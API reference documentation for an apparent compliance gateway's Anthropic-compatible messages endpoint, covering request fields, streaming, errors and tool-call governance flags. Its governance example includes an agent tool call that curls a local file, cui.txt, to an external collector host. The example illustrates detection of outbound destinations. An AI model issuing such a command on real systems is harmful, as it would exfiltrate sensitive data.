POST /v1/messages

Anthropic-compatible Messages API, built so that coding agents such as Claude Code can target Consus Gateway directly. Every request is served by Claude Sonnet 4.5 on ITAR-compliant infrastructure. Unlike /v1/chat/completions, this endpoint is single-model by design: the model field in the request body is accepted but ignored. The compliance boundary is enforced at the architecture level, so there is no path through this endpoint to a non-ITAR model.

Request

Headers

| Header | Required | Description |
| --- | --- | --- |
| x-api-key | Yes | Your API key |
| Content-Type | Yes | application/json |
| anthropic-version | No | Accepted but ignored. The gateway manages the version field for upstream compatibility. Use the body field anthropic_version to override. |

Body

The body is forwarded as native Anthropic Messages API JSON. Refer to Anthropic’s Messages API reference for the full schema. The gateway validates two fields and lets the upstream model validate everything else:

| Field | Required | Description |
| --- | --- | --- |
| messages | Yes | Non-empty array. |
| max_tokens | Yes | Positive integer. |

The gateway handles the remaining fields as follows:
  • model — accepted but ignored. Every request serves Sonnet 4.5.
  • stream — controls SSE response shape, see Streaming below.
  • anthropic_version — managed by the gateway for upstream compatibility. An explicit value in the body wins.
  • Anthropic features the upstream provider does not yet support are stripped before forwarding (e.g. context_management).
  • All other fields (system, temperature, top_p, tools, tool_choice, stop_sequences, metadata, …) pass through unchanged.
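
The two gateway-side checks described above can be mirrored on the client to catch malformed requests before they are sent. The following is a minimal sketch, not the gateway's implementation: the function name check_messages_request and the wording of the messages error are assumptions made for illustration, while the max_tokens message matches the error example on this page.

```python
from typing import Any


def check_messages_request(body: dict[str, Any]) -> list[str]:
    """Return the problems that would likely cause a 400 from the gateway.

    Hypothetical client-side helper; it only covers the two fields the
    gateway is documented to validate (messages and max_tokens).
    """
    problems: list[str] = []

    messages = body.get("messages")
    if not isinstance(messages, list) or len(messages) == 0:
        # Wording of this message is an assumption, not taken from the gateway.
        problems.append("'messages' must be a non-empty array.")

    max_tokens = body.get("max_tokens")
    # bool is a subclass of int in Python, so exclude it explicitly.
    if isinstance(max_tokens, bool) or not isinstance(max_tokens, int) or max_tokens <= 0:
        problems.append("'max_tokens' must be a positive integer.")

    return problems
```

Every other field is left unchecked here on purpose, since the gateway passes those through and lets the upstream model validate them.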

Response

Headers

| Header | Description |
| --- | --- |
| x-consus-served-model | The model that actually served the request. Always claude-sonnet-4-5. |
| x-request-id | UUID for tracing this request through gateway logs. |

Non-Streaming

The body is the native Anthropic Messages response, with one optional addition (x_consus_governance, see below).
{
  "id": "msg_01ABC...",
  "type": "message",
  "role": "assistant",
  "content": [
    {"type": "text", "text": "Hello! How can I help you?"}
  ],
  "model": "claude-sonnet-4-5",
  "stop_reason": "end_turn",
  "stop_sequence": null,
  "usage": {
    "input_tokens": 10,
    "output_tokens": 12
  }
}

Streaming

Set stream: true in the body to receive Server-Sent Events. The event sequence matches Anthropic’s streaming protocol:
event: message_start
data: {"type":"message_start","message":{...}}

event: content_block_start
data: {"type":"content_block_start","index":0,"content_block":{"type":"text","text":""}}

event: content_block_delta
data: {"type":"content_block_delta","index":0,"delta":{"type":"text_delta","text":"Hello!"}}

event: content_block_stop
data: {"type":"content_block_stop","index":0}

event: message_delta
data: {"type":"message_delta","delta":{"stop_reason":"end_turn","stop_sequence":null},"usage":{"output_tokens":12}}

event: message_stop
data: {"type":"message_stop"}
Tool use blocks emit content_block_delta with {"type":"input_json_delta","partial_json":"..."}.
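
For clients that do not use an Anthropic SDK, the event sequence above can be parsed with a few lines of code. The sketch below assumes the full SSE payload is already available as one string; the helper names iter_sse_events and collect_text are hypothetical. It collects text_delta fragments and skips other delta types such as input_json_delta.

```python
import json
from typing import Iterator


def iter_sse_events(raw: str) -> Iterator[tuple[str, dict]]:
    """Yield (event_name, data) pairs from a complete SSE payload."""
    # Events are separated by a blank line; normalise CRLF first.
    for chunk in raw.replace("\r\n", "\n").split("\n\n"):
        event_name = None
        data_lines = []
        for line in chunk.split("\n"):
            if line.startswith("event:"):
                event_name = line[len("event:"):].strip()
            elif line.startswith("data:"):
                data_lines.append(line[len("data:"):].strip())
        if event_name and data_lines:
            yield event_name, json.loads("\n".join(data_lines))


def collect_text(raw: str) -> str:
    """Concatenate every text_delta fragment in the stream."""
    parts = []
    for event_name, data in iter_sse_events(raw):
        if event_name != "content_block_delta":
            continue
        delta = data.get("delta", {})
        if delta.get("type") == "text_delta":
            parts.append(delta.get("text", ""))
    return "".join(parts)
```

A production client would normally read the response incrementally and should prefer an SDK or an established SSE library; this version only illustrates the wire format.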

Streaming caveat

The gateway buffers the upstream response before returning it to the client. The HTTP layer therefore delivers all SSE events at once after the upstream model finishes — the wire shape is correct, but incremental tokens are not delivered over time. Anthropic SDK clients that consume the SSE stream parse it correctly regardless.

Tool Use

Tool definitions and tool_use content blocks pass through natively. There is no translation through OpenAI’s tool_calls shape.

Tool Call Governance Metadata

When a model returns tool_use blocks, the gateway scans each input payload for outbound destinations: URLs with a scheme such as https://, ftp://, s3://, data:, or mailto:, as well as raw IPv4 addresses. When any are found, the response includes an advisory x_consus_governance field alongside the standard Anthropic body. The tool_use block itself is not modified.
{
  "id": "msg_01...",
  "type": "message",
  "role": "assistant",
  "content": [
    {
      "type": "tool_use",
      "id": "toolu_01...",
      "name": "Bash",
      "input": {"command": "curl https://collector.example.com/ingest -d @cui.txt"}
    }
  ],
  "model": "claude-sonnet-4-5",
  "stop_reason": "tool_use",
  "usage": {"input_tokens": 20, "output_tokens": 30},
  "x_consus_governance": {
    "flags": [
      {
        "tool_call_id": "toolu_01...",
        "tool_name": "Bash",
        "destinations": ["https://collector.example.com/ingest"],
        "reason": "external_destination"
      }
    ]
  }
}
In streaming mode, flagged responses receive a final consus_governance SSE event after message_stop:
event: consus_governance
data: {"type":"consus_governance","x_consus_governance":{"flags":[...]}}
This is an advisory signal. The gateway does not block or redact tool calls — your application receives the real input and decides what to do with the destinations.
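
Because the signal is advisory, the decision logic lives in the client. One possible approach, sketched here under assumptions, is to compare each flagged destination against an allowlist of hosts before executing the tool call. The function name blocked_tool_calls and the allowlist policy are hypothetical; only the x_consus_governance field names come from the response shape shown above.

```python
from typing import Any
from urllib.parse import urlparse


def blocked_tool_calls(
    response: dict[str, Any], allowed_hosts: set[str]
) -> dict[str, list[str]]:
    """Map tool_call_id to the flagged destinations that are not allowlisted.

    Destinations without a parseable host (for example mailto: addresses or
    bare IPv4 strings) are treated as not allowed, which is the conservative
    choice for this sketch.
    """
    blocked: dict[str, list[str]] = {}
    governance = response.get("x_consus_governance") or {}
    for flag in governance.get("flags", []):
        rejected = [
            dest
            for dest in flag.get("destinations", [])
            if urlparse(dest).hostname not in allowed_hosts
        ]
        if rejected:
            blocked[flag["tool_call_id"]] = rejected
    return blocked
```

An agent loop could call this on each response and skip, or ask for confirmation on, any tool call whose id appears in the result.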

Errors

Errors are returned in Anthropic’s error shape:
{
  "type": "error",
  "error": {
    "type": "invalid_request_error",
    "message": "'max_tokens' must be a positive integer."
  }
}

| Status | Anthropic error.type | When |
| --- | --- | --- |
| 400 | invalid_request_error | Body is not valid JSON, messages empty/missing, max_tokens missing or non-positive, or the upstream model rejected the request. |
| 401 | authentication_error | API key is missing or invalid. |
| 429 | rate_limit_error | Upstream model rate limit, or your key’s rate/quota limit. |
| 500 / 502 / 504 | api_error | Internal error, upstream provider outage, or upstream timeout. |
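
A client can use the status code and the error body together to decide whether a retry makes sense. The sketch below is illustrative only: the function name classify_error and the choice to retry on 429, 500, 502, and 504 are assumptions, not behavior documented by the gateway.

```python
import json

# Assumed retry policy: rate limits and server-side failures may be transient.
RETRYABLE_STATUSES = {429, 500, 502, 504}


def classify_error(status: int, body_text: str) -> tuple[str, str, bool]:
    """Return (error_type, message, should_retry) for a non-2xx response."""
    error = {}
    try:
        parsed = json.loads(body_text)
        if isinstance(parsed, dict) and isinstance(parsed.get("error"), dict):
            error = parsed["error"]
    except json.JSONDecodeError:
        # Body was not JSON (for example a proxy error page); fall through.
        pass

    error_type = error.get("type", "unknown")
    message = error.get("message", "")
    return error_type, message, status in RETRYABLE_STATUSES
```

Retries on 429 would typically be paired with a backoff delay, and 400 and 401 responses are returned as non-retryable because resending the same request would fail the same way.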

Known Limitations

  • No /v1/messages/count_tokens. Clients that call it (Anthropic SDK in some configurations) fall back to client-side estimation; this works for Claude Code in practice.
  • Streaming buffers at the gateway boundary. See the streaming caveat above.
  • Single-model endpoint. The model field is ignored. If you need a different model, use /v1/chat/completions.

Examples

curl

curl -X POST https://api.consus.io/v1/messages \
  -H "x-api-key: $CONSUS_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "max_tokens": 256,
    "messages": [{"role": "user", "content": "Hello."}]
  }'

Anthropic Python SDK

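import os

from anthropic import Anthropic

# Read the key from the environment. Python does not expand "$CONSUS_API_KEY"
# inside a string literal, so the literal would be sent as the key.
api_key = os.environ["CONSUS_API_KEY"]

client = Anthropic(
    base_url="https://api.consus.io",
    api_key=api_key,
    default_headers={"x-api-key": api_key},
)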

message = client.messages.create(
    model="claude-sonnet-4-5",  # ignored by the gateway, kept for SDK compatibility
    max_tokens=256,
    messages=[{"role": "user", "content": "Hello."}],
)
print(message.content[0].text)